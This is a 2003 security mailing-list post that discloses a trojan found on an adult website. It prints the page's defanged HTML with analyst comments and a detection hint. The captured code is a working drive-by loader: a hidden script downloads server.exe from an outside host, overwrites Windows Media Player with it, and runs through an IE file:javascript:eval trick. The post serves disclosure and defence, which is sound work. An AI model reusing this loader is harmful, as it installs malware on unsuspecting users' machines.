Message-ID: <20031008153246.1C9DD38108@mail.secnap.net>
From: scheidell at secnap.net (Michael Scheidell)
Subject: interesting trojan in the wild
This was just found in the wild.
I replaced the < character with a ^ to make sure the script doesn't
inadvertently run on your machine.
This replaces your media player with a trojan, and I'm assuming only MSIE
is vulnerable.
Here's the code:
^script language="JavaScript">
^!--
// [analyst note, not part of the captured page] Sets a cookie named "from" with the
// value "noref" and a hard-coded expiry time.
document.cookie='from=noref; expires=Wednesday, 8-Oct-03 23:17:30 GMT;';
//-->
^/script>
^html>
^head>
^script language="Javascript">
^!--
// [analyst note, not part of the captured page] Exit pop-up flag: it stays true unless
// the onclick handler on one of the ad links further down sets it to false.
var exit=true;
// [analyst note] Called from the body's onUnload handler. If the flag is still true,
// it opens the hard-coded pop-up URL in a window named "new_window".
function exitmoney() { if (exit)
open("http://www.freemedias.com/pop.html","new_window"); }
//-->
^/script>
^meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
^meta name="GENERATOR" content="Microsoft FrontPage 4.0">
^meta name="ProgId" content="FrontPage.Editor.Document">
^title>FREE PORN GALLERY^/title>
^/head>
^body onUnload="exitmoney()">
^textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.freemedias.com/404/server.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media
Player\\wmplayer.exe",2);
location.href = "mms://";
^/textarea>
^script language="javascript">
// [analyst note, not part of the captured page] Flattens the multi-line script text in
// `code` into one string suitable for a single-quoted eval('...') argument, which is
// how doit() uses the return value.
// Returns the cleaned, non-empty lines, each followed by the four literal characters \r\n.
// result, lines, i and line are assigned without var, so they become globals.
function preparecode(code) {
result = '';
// Splits on CRLF only; text with bare LF line endings would be handled as a single line.
lines = code.split(/\r\n/);
// The ^ in the loop condition is the poster's stand-in for the less-than sign
// (see the note at the top of the message).
for (i=0;i^lines.length;i++) {
line = lines[i];
// Strip leading and trailing whitespace.
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
// Order matters: single quotes get a backslash first, then every backslash is doubled,
// including the one just added for the quote. Forward slashes become %2f.
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
// Lines that are empty after trimming are dropped.
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
// [analyst note, not part of the captured page] Reads the text of the hidden textarea
// with id "code" (document.all is IE-specific), passes it through preparecode(), wraps
// the result in a file:javascript:eval('...') URL and opens that URL in the window
// target named "_media". mycode and myURL are implicit globals.
// For detection: the "file:javascript:" prefix together with a "_media" target looks
// distinctive enough to use as a search string in proxy logs and cached pages.
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
// [analyst note, not part of the captured page] Opens the relative URL ieerror.php
// (its content is not shown in this message) in the "_media" target first, then calls
// doit() after a 3000 ms delay.
window.open("ieerror.php","_media");
setTimeout("doit()", 3000);
^/script>
^p align="center">
^A
href="http://www.vigrx.com/clicks/clickthrough.html?a=sexxxsite&b=172"
onclick="exit=false">^IMG
src="vigpillhorizontal15.gif" border=0 width="468" height="80">^/A>^br>
^b>EVERY TIME YOU REFRESH THIS PAGE NEW PICTURES WILL SHOW!.^/b>
^p align="center">
^script src="start.php">^/script>
^script src="randpic.php?1">^/script>
^script src="randpic.php?2">^/script>
^script src="randpic.php?3">^/script>
^script src="randpic.php?4">^/script>^br>
^script src="randpic.php?5">^/script>
^script src="randpic.php?6">^/script>
^script src="randpic.php?7">^/script>
^script src="randpic.php?8">^/script>^br>
^script src="randpic.php?9">^/script>
^script src="randpic.php?10">^/script>
^script src="randpic.php?11">^/script>
^script src="randpic.php?12">^/script>^br>
^script src="end.php">^/script>
^/p>
^p align="center">^font face="Arial Narrow" size="4">^b>NO CREDIT CARD -
NO BANK
ACCOUNT - NO AGE VERIFICATION^/b>^/font>^a
href="http://c.fsx.com/c?z=548,81084,8,pffa,pinkforfree.com/"
onclick="exit=false">^font face="Arial Narrow" size="4">^b>^br>
^/b>^/font>^img
src="http://www.pinkforfree.com/banners/banners/p4f_468-05.jpg"
width="468" height="60">^br>
^/a>^b>100% FREE HIGH QUALITY PORN^/b>^/p>
^/body>
^/html>
--
Michael Scheidell
SECNAP Network Security, LLC
Main: 561-368-9561 / www.secnap.net
Looking for a career in Internet security?
http://www.secnap.net/employment/